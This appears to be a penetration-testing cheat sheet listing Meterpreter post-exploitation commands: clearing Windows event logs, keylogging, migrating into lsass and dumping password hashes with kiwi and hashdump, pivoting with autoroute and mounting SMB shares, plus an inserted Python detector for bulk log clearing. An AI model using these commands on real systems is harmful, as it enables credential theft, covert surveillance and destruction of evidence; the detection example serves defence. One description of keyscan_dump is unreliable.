Tier II

Meterpreter

Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.



Clearing Windows Event Logs (Windows)


Use this command to delete all the Windows Event logs:
clearev
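
Clearing the logs leaves its own trace: Windows records Event ID 1102 in the Security log and Event ID 104 in the System log when a log is cleared. The following is an added detection example, not part of the original page: it parses an XML event export and flags accounts that clear several logs within a short window. The event layout, sample events, account names and the 60-second window are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta
CLEAR_IDS = {"1102", "104"}  # "log cleared": 1102 lands in Security, 104 in System

def _event(eid, time, user, cleared=""):
    """Build one constructed event in the Windows event XML layout (assumed)."""
    channel = f"<Channel>{cleared}</Channel>" if cleared else ""
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            f'<System><EventID>{eid}</EventID><TimeCreated SystemTime="{time}"/></System>'
            f'<UserData><LogFileCleared><SubjectUserName>{user}</SubjectUserName>'
            f'{channel}</LogFileCleared></UserData></Event>')

# Constructed sample export: accounts and timestamps are made up.
SAMPLE = "<Events>" + "".join([
    _event("104", "2024-05-01T10:15:02.1000000Z", "svc_backup", "Application"),
    _event("104", "2024-05-01T10:15:02.9000000Z", "svc_backup", "System"),
    _event("1102", "2024-05-01T10:15:03.4000000Z", "svc_backup"),
    _event("104", "2024-05-03T02:00:00.0000000Z", "admin_jo", "Application"),
    _event("4624", "2024-05-03T02:05:00.0000000Z", "admin_jo"),  # unrelated ID, ignored
]) + "</Events>"

def find_log_clears(xml_text):
    """Return sorted (time, account, cleared log) for each log-clear event."""
    clears = []
    for event in ET.fromstring(xml_text):
        # Later elements win: UserData/Channel (cleared log) overrides System/Channel.
        f = {el.tag.rsplit("}", 1)[-1]: el for el in event.iter()}
        eid = f["EventID"].text
        if eid not in CLEAR_IDS:
            continue
        when = datetime.strptime(f["TimeCreated"].get("SystemTime")[:19], "%Y-%m-%dT%H:%M:%S")
        clears.append((when, f["SubjectUserName"].text, "Security" if eid == "1102" else f["Channel"].text))
    return sorted(clears)

def bulk_clears(clears, window=timedelta(seconds=60), min_logs=2):
    """Flag accounts that cleared min_logs or more distinct logs within the window."""
    by_user, alerts = {}, []
    for when, user, log in clears:
        by_user.setdefault(user, []).append((when, log))
    for user, items in by_user.items():
        for start, _ in items:
            logs = sorted({log for when, log in items if timedelta(0) <= when - start <= window})
            if len(logs) >= min_logs:
                alerts.append((user, start, logs))
                break
    return alerts

if __name__ == "__main__":
    print(bulk_clears(find_log_clears(SAMPLE)))
```

Forwarding events to a central collector keeps these records available even after the local logs are wiped.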


Keylogging (Windows)


Exploit a target and gain the Meterpreter shell (like in the previous examples)
Start capturing keystrokes (any input on the target) of the target host:
keyscan_start

Show the files that the user has created:
keyscan_dump


Pass-the-Hash attack (Windows) with Metasploit


Exploit a target and gain the Meterpreter shell (like in the previous examples)
In the target Meterpreter shell, get the process ID:
pgrep lsass

Migrate to that ID:
migrate target-id

Get the name of the target system you are using:
getuid

Run the Kiwi tool:
load kiwi

Get the admin username and NTLM credentials (hash):
lsa_dump_sam

Also get the LM password hash of the target(s):
hashdump

After you have got the hashes, you can run the Metasploit framework again.


Save the target's new IP in Metasploit


After the exploit, save the other IP that the target is using:
run autoroute -s new-target-ip


SMB - Samba Shares in a Meterpreter shell


net use D: \\target-ip\share